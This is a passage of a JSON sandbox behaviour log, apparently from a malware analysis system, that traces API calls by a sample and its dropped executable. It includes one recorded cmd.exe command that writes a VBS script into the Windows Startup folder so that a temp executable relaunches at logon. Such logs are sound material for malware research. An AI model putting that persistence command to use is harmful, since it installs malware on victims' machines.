"NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001c0" } ], "repeated": 0, "id": 113 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001c4" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75392000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75392000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001a8" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001ac" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001a4" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000188" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000018c" } ], "repeated": 0, "id": 123 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000190" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000194" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000198" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001a0" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000019c" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000168" } ], "repeated": 0, "id": 129 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000016c" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000164" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000160" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000015c" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000158" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000144" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000148" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000128" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000012c" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000f8" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000fc" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000100" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000100" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000100" }, { "name": "ValueName", "value": "DisableMetaFiles" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000100" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000100" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000100" }, { "name": "ValueName", "value": "DisableUmpdBufferSizeCheck" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableUmpdBufferSizeCheck" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000100" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000f4" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000f0" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000ec" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001f4" } ], "repeated": 0, "id": 156 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000e0" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000a4" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000c4" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000000c0" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "process", "api": "NtTerminateProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "ExitCode", "value": "0x00000000" } ], "repeated": 0, "id": 163 } ], "threads": [ "10680", "9864", "8536", "10920", "9160" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00570000", "MainExeSize": "0x0005a000", "Bitness": "32-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 7456, "process_name": "f1e62c0e7345fc825586.exe", "parent_id": 4492, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "first_seen": "2025-03-02 21:32:30,951", "calls": [ { "timestamp": "2025-03-02 21:32:31,170", "thread_id": "7632", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 0 }, { "timestamp": "2025-03-02 21:32:31,185", "thread_id": "7632", "caller": "0x08c6003e", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1 }, { "timestamp": "2025-03-02 21:32:31,185", "thread_id": "7632", "caller": "0x08c6003e", "parentcaller": "0x08c6003e", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll" }, { "name": "BaseAddress", "value": "0x73340000" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-03-02 21:32:31,185", "thread_id": "7632", "caller": "0x0a52003e", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 3 }, { "timestamp": "2025-03-02 21:32:31,201", "thread_id": "7632", "caller": "0x0a52003e", "parentcaller": "0x0a52003e", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll" }, { "name": "BaseAddress", "value": "0x73340000" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-03-02 21:32:31,357", "thread_id": "7632", "caller": "0x004e7042", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-03-02 21:32:31,357", "thread_id": "7632", "caller": "0x004e7055", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-03-02 21:32:31,357", "thread_id": "7632", "caller": "0x004e7055", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualFree" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f760" } ], "repeated": 0, "id": 7 }, { "timestamp": "2025-03-02 21:32:31,373", "thread_id": "7632", "caller": "0x004e7055", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualProtect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880760" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-03-02 21:32:31,373", "thread_id": "7632", "caller": "0x004e70c1", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a540000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-03-02 21:32:31,373", "thread_id": "7632", "caller": "0x004e70e2", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a7c0000" }, { "name": "RegionSize", "value": "0x0008e000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-03-02 21:32:31,373", "thread_id": "7632", "caller": "0x004e718c", "parentcaller": "0x00000000", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a7c0000" }, { "name": "RegionSize", "value": "0x0008e000" }, { "name": "FreeType", "value": "0x00008000" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e70e2", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e718c", "parentcaller": "0x00000000", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "FreeType", "value": "0x00008000" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e70e2", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e718c", "parentcaller": "0x00000000", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "FreeType", "value": "0x00008000" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e70e2", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e718c", "parentcaller": "0x00000000", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "FreeType", "value": "0x00008000" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-03-02 21:32:31,389", "thread_id": "7632", "caller": "0x004e70e2", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00042000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e718c", "parentcaller": "0x00000000", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a550000" }, { "name": "RegionSize", "value": "0x00042000" }, { "name": "FreeType", "value": "0x00008000" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e71a8", "parentcaller": "0x00000000", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a540000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "FreeType", "value": "0x00008000" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x004e71a8" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\oleaut32" }, { "name": "DllBase", "value": "0x76d90000" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e7292", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "oleaut32.dll" }, { "name": "BaseAddress", "value": "0x76d90000" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SysFreeString" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daec30" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-03-02 21:32:31,404", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "oleaut32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": 